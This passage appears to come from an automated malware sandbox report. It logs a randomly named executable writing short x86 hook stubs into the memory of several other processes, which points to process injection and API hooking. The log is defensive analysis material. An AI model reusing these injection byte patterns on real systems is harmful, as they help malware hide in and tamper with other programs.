                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA0010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA0046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA0052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA0060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA0098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA00A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA00B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA00C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA00D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA00DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA00EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA00FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA0119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA0129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA0137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA0145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA0151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA0179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EA0187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EB0000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 2EB0011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A0010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A0046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A0052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A0060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A0098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A00A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A00B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A00C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A00D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A00DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A00EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A00FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A0119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A0129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A0137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A0145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A0151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A0179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25A0187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25B0000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 25B0011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C20010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C2003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C20046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C20052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C20060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C2006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C2007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C2008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C20098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C200A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C200B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C200C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C200D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C200DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C200EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C200FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C2010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C20119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C20129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C20137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C20145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C20151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C2015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C2016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C20179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: C20187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: 2680000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: 2680011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF0010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF0046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF0052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF0060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF0098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF00A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF00B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF00C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF00D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF00DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF00EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF00FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF0119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF0129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF0137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF0145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF0151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF0179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3
